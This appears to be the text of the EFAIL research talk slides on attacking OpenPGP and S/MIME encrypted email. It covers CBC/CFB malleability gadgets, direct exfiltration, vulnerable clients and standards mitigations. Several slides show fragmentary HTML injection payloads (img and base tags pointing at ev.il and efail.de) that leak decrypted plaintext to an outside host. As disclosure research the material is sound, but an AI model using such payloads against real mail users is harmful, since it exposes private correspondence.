https://efail.de/ Attacking End-to-End Encrypted Emails Joint research with : Prof. Dr. Sebastian Schinzel Damian Poddebniak, Christian Dresen, Twitter: @seecurity Jens Müller, Fabian Ising, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk, Marcus Brinkmann.
Email. 2
av2.com av1.com smtp.corp2 smtp.corp1 imap.corp2 imap.corp1 archive.corp1 archive.corp2
av1.com smtp.corp1 imap.corp1 archive.corp1
There is no such thing as “My Email”. 5
av1.com Assumption: smtp.corp1 imap.corp1 Attacker has archive.corp1 access to emails!
Two competing standards OpenPGP (RFC 4880) • First “encryption for the masses” • Favored by privacy advocates • Most widely used email clients require plugin S/MIME (RFC 5751) • Favored by corporate organizations • Native support in most widely used email clients 7
New published PGP public keys per month ? Known limitations! Usability Snowden Effekt Thanks to Marcus Brinkmann @neopg_ Enigmail New keys at keyserver Hard for S/MIME Opsec von Snowden und thegruq Ver- und Entschlüsselung nur in separater Anwendung! 8
Daily users of Enigmail Known limitations! Usability Snowden Effekt Enigmail New keys at keyserver Hard for S/MIME Opsec von Snowden und thegruq Ver- und Entschlüsselung nur in separater Anwendung! 9
‘99 ‘06 ‘15 10
PGP and OpSec Some tutorials recommend using PGP outside of email client. • https://gist.github.com/grugq/ 03167bed45e774551155 • https://vimeo.com/56881481 Others recommended Enigmail in default settings (i.e. HTML switched on) 11
Agenda Efail CBC/CFB Gadgets Efail Direct Exfiltration Reply to attacker 12
2014: Enigmail won’t encrypt. https://sourceforge.net/p/enigmail/forum/support/thread/3e7268a4/ 13
2017: Outlook includes plaintext in encrypted email. https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/ 14
2018: Enigmail/PEP won‘t encrypt. https://www.heise.de/security/meldung/c-t-deckt-auf-Enigmail-verschickt-Krypto-Mails-im-Klartext-4180405.html 15
Agenda Efail CBC/CFB Gadgets Efail Direct Exfiltration Reply to attacker Plaintext bugs 16
Hybrid decryption • Choose message 𝑛 Content-type: app/encrypted • Generate session key 𝑡 𝒍 𝑡 • Encrypt message 𝑛 with session key 𝑡 Dear Alice, – 𝑑 = 𝐵𝐹𝑇 𝑡 (𝑛) • Encrypt session key 𝑡 with public key c thank you for your email. 𝑞𝑣𝑐 of recipient The meeting tomorrow – 𝑙 = 𝑆𝑇𝐵 𝑞𝑣𝑐 (𝑡) will be at 9 o‘clock . • Send the encrypted session key and the encrypted message to the recipient 17
Hybrid decryption • Obtain the encrypted email Content-type: app/encrypted • Extract ciphertext 𝑙 and ciphertext 𝑑 𝒍 𝑡 • Decrypt 𝑙 with private key 𝑡𝑓𝑑 to Dear Alice, obtain session key 𝑡 – 𝑡 = 𝑆𝑇𝐵 𝑡𝑓𝑑 (𝑙) c thank you for your email. • Decrypt ciphertext 𝑑 with session key The meeting tomorrow 𝑡 to obtain the cleartext 𝑛 will be at 9 o‘clock . – 𝑛 = 𝐵𝐹𝑇 𝑡 𝑑 18
Ciphertext malleability 𝑡 Dear Alice, ↯ ????????????????ur efail. The meeting tomorrow will 𝒅 be at 9 o‘clock . 19
CBC Mode of Encryption C 2 C 1 C 0 decryption decryption Content-type: te xt/html\nDear Bob P 0 P 1 20
Malleability of CBC/CFB C 2 C 1 C 0 ' decryption decryption Z ontent-type: te xt/html\nDear Bob P 0 ' P 1 21
Malleability of CBC/CFB C 2 C 1 C 0 ⊕ P 0 decryption decryption 0000000000000000 xt/html\nDear Bob P 0 ' P 1 CBC Gadget 22
Malleability of CBC/CFB C 2 C 1 C 0 ⊕ P 0 ⊕ P c decryption decryption <img src =” ev.il/ xt/html\nDear Bob P c P 1 23
Malleability of CBC/CFB C 2 C 1 ' C 0 decryption decryption Content-type: te Z t/html\nDear Bob P 0 ' P 1 ' 24
Malleability of CBC/CFB C 2 C 1 ' C 0 decryption decryption ???????????????? Z t/html\nDear Bob P 0 ' P 1 ' 25
Ciphertext Malleability 𝑡 Dear Alice, ↯ ????????????????ur efail. The meeting tomorrow will 𝒅 be at 9 o‘clock . 26
MAC != digital signature “valid signature” Message Authentication Codes • Protection against ciphertext tampering “invalid signature” Digital Signatures? • Merely used to display status message or icon • In many cases, attacker can – remove signatures “encrypted, not signed” – sign unknown ciphertext under own identity 27
S/MIME 28
S/MIME 29
Attacking S/MIME Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi Original Crafted <base " " href="http:"> ???????????????? ???????????????? <img " ???????????????? ???????????????? " src="efail.de/ Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi "> ???????????????? Modify Duplicate Reorder 30
Backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail KMail Claws Thunderbird Linux Evolution Trojitá Mutt 40/47 clients have User interaction Airmail MailMate Apple Mail macOS No user interaction backchannels requiring Mail App Outlook CanaryMail iOS Leak via bypass no user interaction K-9 Mail MailDroid J avascript execution Android R2Mail Nine GMail Yahoo! GMX Mail.ru Mailbox ProtonMail Webmail iCloud FastMail Mailfence ZoHo Mail HushMail Outlook.com Roundcube Horde IMP Exchange GroupWise Webapp RainLoop AfterLogic Mailpile 32
• S/MIME has no standard- conforming countermeasure • Email clients try to mitigate this (insufficiently) 33
Demo ohne html
Outlook: Non-HTML CBC Gadgets? recommendations PDF 28.12.2018 35
Outlook: Non-HTML CBC Gadgets? recommendations PDF 28.12.2018 36
Outlook: Non-HTML CBC Gadgets? recommendations MS Word 28.12.2018 37
Outlook: Non-HTML CBC Gadgets? recommendations LibreOffice 28.12.2018 38
Outlook: Non-HTML CBC Gadgets? Challenge: 1. Write a non-HTML demo that exfiltrates OpenPGP or S/MIME email plaintext blocks via attachments (PDF, Word, XML, ...). 2. First successful submission gets a crate of Club Mate and Efail swag! 39
Efail-related changes to S/MIME Efail CBC Gadget attack: Efail direct exfiltration attack: EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, 28.12.2018 40 https://tools.ietf.org/html/draft-ietf-lamps-rfc5751-bis-12#page-45 Schwenk
OPENPGP 41
Differences S/MIME OpenPGP • OpenPGP uses a variation of CFB-Mode • Plaintext compression is enabled by default • OpenPGP defines Modification Detection Code “MDC“ ( 𝑇𝐼𝐵1(𝑛) ) MDC SEIP m sha1(m) 42
OpenPGP RFC on invalid MDCs 43
# new PGP keys with/without MDCs per year Thanks to Marcus Brinkmann @neopg_ 28.12.2018 44
# cumulative valid PGP keys not supporting MDCs per year Thanks to Marcus Brinkmann @neopg_ 28.12.2018 45
Attacking OpenPGP 1. MDC stripped: SEIP m sha1(m) 2. MDC incorrect: SEIP m‘ sha1(m) 3. SEIP->SE downgrade SEIP m sha1(m) 46
Attacking OpenPGP Client Plugin (up to MDC Stripped MDC Incorrect SEIP -> SE version) Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN Outlook 2013 GPG4WIN Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01 Vulnerable Not Vulnerable 47
Efail-related changes to OpenPGP https://tools.ietf.org/html/draft-ietf-openpgp-rfc4880bis-05#section-5.8 48
Efail-related changes to OpenPGP https://tools.ietf.org/html/draft-ietf-openpgp-rfc4880bis-05#page-104 49
Efail-related changes to OpenPGP Checking MDC only possible after full decryption – GnuPG streams plaintext to app during decryption – Only when finished, GnuPG prints flag whether or not decryption was successful. OpenPGP draft already supported chunking of plaintext – Pro: Authenticate chunks before giving it to app! – Con: Recommended chunk size is 128MByte (OpenPGP implementations may not want to cache 128MByte and thus use streaming again) https://tools.ietf.org/html/draft-ietf-openpgp-rfc4880bis-05#page-63 https://mailarchive.ietf.org/arch/msg/openpgp/KXM9nqbhkn3ELTznP6YBQhEipC0 50
Efail-related changes to GnuPG • MDC errors now result in hard failures (not merely warnings). • GnuPG now always uses MDC independently if key denotes MDC support or not. • But: – Sets default chunks sizes from 1GByte to 128MByte. – Still streams unauthenticated plaintext. 51
av1.com smtp.corp1 imap.corp1 archive.corp1
Agenda Efail CBC/CFB Gadgets Efail Direct Exfiltration Reply to attacker Plaintext bugs 53
Efail Direct Exfiltration Alice’s mail program encrypts the email Alice writes a Mail to Bob Encryption From: Alice To: Bob -----BEGIN PGP MESSAGE----- Dear Bob, hQIMA1n/0nhVYSIBARAAiIsX1QsH the meeting tomorrow will be ZObL2LopVexVVZ1uvk3wieArHUg… at 9 o‘clock . -----END PGP MESSAGE----- 54
Recommend
More recommend